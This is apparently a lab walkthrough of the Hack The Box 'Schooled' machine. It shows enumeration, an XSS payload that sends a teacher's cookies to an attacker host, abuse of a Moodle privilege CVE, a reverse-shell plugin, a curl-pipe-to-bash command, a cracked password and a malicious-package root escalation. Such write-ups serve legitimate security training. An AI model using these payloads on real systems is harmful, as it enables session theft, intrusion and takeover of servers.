Home Hack The Box - Schooled writeup
Post
Cancel

Hack The Box - Schooled writeup

Schooled image

Enumeration

Start with nmap enumeration

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
$ nmap -sC -sV -oN nmap-initial 10.10.10.234

Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-08 18:00 CEST
Nmap scan report for 10.10.10.234
Host is up (0.027s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9 (FreeBSD 20200214; protocol 2.0)
| ssh-hostkey: 
|   2048 1d:69:83:78:fc:91:f8:19:c8:75:a7:1e:76:45:05:dc (RSA)
|   256 e9:b2:d2:23:9d:cf:0e:63:e0:6d:b9:b1:a6:86:93:38 (ECDSA)
|_  256 7f:51:88:f7:3c:dd:77:5e:ba:25:4d:4c:09:25:ea:1f (ED25519)
80/tcp open  http    Apache httpd 2.4.46 ((FreeBSD) PHP/7.4.15)
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.46 (FreeBSD) PHP/7.4.15
|_http-title: Schooled - A new kind of educational institute
Service Info: OS: FreeBSD; CPE: cpe:/o:freebsd:freebsd

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.57 seconds

We write down the apache and php version

1
Apache httpd 2.4.46 ((FreeBSD) PHP/7.4.15)

The website has been written in php, so we use dirbuster with php extension enabled.
It doesn’t produce any interesting result.

By enumerating all the remote ports, we discover another open port: 33060/tcp open mysqlx

Mysqlx

Mysqlx is an eXtended version of Mysql.

We create a quick script to interact with the service.

But

We try to log in using the name of teachers we found in the website but none of them works.

Given the presence of mysqlix, a database is running on the remote machine. So we repeat the directory enumeration with other possible extensions (db,conf). Again, gobuster is useless in this case.

We keep enumerating

Subdomain enumeration

A DNS zone transfer is not going to work as there is no DNS server listening in the target machine.

We can however try to bruteforce the subdomains using gobuster vhost.

In this mode, gobuster will visit each subdomain we provide with a wordlist file and based on the response it will decide whether the subdomain exists or not

1
gobuster vhost -u http://schooled.htb -w /usr/share/SecLists/Discovery/DNS/subdomains-top1million-110000.txt -o gobuster-subdomain.txt -t 40

It finds moodle.schooled.htb.

We add it to the /etc/hosts file and we visit the root page

Moodle.schooled.htb

We create an account and log in to Moodle. The mail we register needs to have a student.schooled.htb domain.

Once logged in, we can register to the math course and look at the teacher’s profile.

Now that we have the teachers’ domain, we can try to register to Moodle using a @staff.schooled.htb account. We may be able to get teacher role.

Too easy to be true. It doesn’t work:

`{: .shadow}

Moodle enumeration

We fire up gobuster both on the root directory and under the moodle directory

1
gobuster dir -u http://moodle.schooled.htb/moodle/ -w /usr/share/wordl[0/8]dirbuster/directory-list-2.3-medium.txt -o gobuster-moodle.txt -t 40 -x php,db

We have a bunch of files but after a closer analysis none of them seems very useful.

Instead, we find a tool for moodle enumeration: https://github.com/inc0d3/moodlescan.

We run it with python3 moodlescan.py -k -u http://moodle.schooled.htb/moodle.
The -k option ignores the certificate

Version number is 3.9-beta.
We can check if there are known exploits for Moodle 3.9-beta.

Many Moodle vulnerabilities can be found here: https://snyk.io/vuln/composer:moodle%2Fmoodle

There are a bunch of vulnerabilities for the 3.9.

If we read the Math teacher’s announcement carefully, we can clearly guess what is the kind of vulnerability that may be exploited.

As guessable by the announcment, the teacher will visit the student’s profile therefore suggesting an XSS vulnerability.

PrivEsc from student role: XSS - CVE-2020-25627

A high impact XSS vulnerability stands out for the unsufficient sanitization of the moodlenetprofile (also mentioned in the announement).

We first try to confirm the vulnerability

and it works

We know the teacher will visit our profile. So we can exploit this vulnerability and make the teacher kindly send his session cookies to us.

This time our payload is: <img src=x onerror=this.src='http://10.10.14.44:8000/?c='+document.cookie>

We wait a bit and we get

We set the new cookie and we can successfully log in as the teacher Manuel Philips

PrivEsc from teacher role : CVE-2020-14321

We look at vulnerabilities of moodle 3.9 beta again

A Proof of Concept has been implemented here: https://github.com/HoangKien1020/CVE-2020-14321.

We first enroll the IT teacher Jamie Borham (as we thought he had Manager role).

We turn burp suite on and temper the request as shown in the PoC in order to self-assign Manager.
(We are using userList[]=24 because 24 is the id of the Math teacher)

Response is successful

And we have manager role now

Although we have Manager’s permission, we cannot login as Jamie Borham (probably he isn’t a Manager?).

So we repeat the steps for the other teachers and we manage to get the Manager role by logging in as Lianne Carter

It’s now time of RCE. We navigate to the plugins tab and install a new plugin as shown in the PoC.
(We used the pentestermonkey php reverse shell as malicious payload)

Visiting http://moodle.schooled.htb/moodle/blocks/rce/lang/en/block_rce.php:

User

We are in a freeBSD distro.

We start by stabilizing the shell:

1
2
3
4
5
$ find . -iname python3 2>/dev/null
./usr/local/bin/python3
./usr/local/share/bash-completion/completions/python3
$ /usr/local/bin/python3 -c 'import pty;pty.spawn("/bin/bash")'
[www@Schooled /]$ 

We run linpeas. curl is in /usr/local/bin/.

1
/usr/local/bin/curl http://10.10.14.217:9002/linpeas.sh | /bin/bash

We find the credentials of the mysql database:

We can log in

take username and passwords from mdl_user table

We are interested to these ones:

And in particular to the admin’s password (Jamie)

We can crack the hash using hashcat.
The algorith used for the hash is bcrypt

1
hashcat -a 0 -m 3200 hashes /usr/share/wordlists/rockyou.txt --username

We manage to crack the hash:

1
2
$ hashcat -a 0 -m 3200 hash /usr/share/wordlists/rockyou.txt --username --show
admin:$2y$10$3D/gznFHdpV6PXt1cLPhX.ViTgs87DCE5KqphQhGYR5GFbcl4qTiW:!QAZ2wsx

Root

The pkg install * is indeed very suspicious there.

We can look it up on GTFObins and easily follow the instructions.

We create the file containing our reverse shell (I tried a couple of them before finding one that actually worked)

Then we create the freeBSD malicious package with fpm -n x -s dir -t freebsd -a all --before-install pwn/pwn.sh pwn

We can send the package to the machine with scp

To install the package on the remote host and trigger our malicious code: jamie@Schooled:~ $ sudo pkg install -y --no-repo-update ./x-1.0.txz

The reverse shell works and we are root now.

1
2
3
4
5
6
$ nc -lnvp 4242
listening on [any] 4242 ...
connect to [10.10.14.217] from (UNKNOWN) [10.10.10.234] 15762
# whoami
root

This post is licensed under CC BY 4.0 by the author.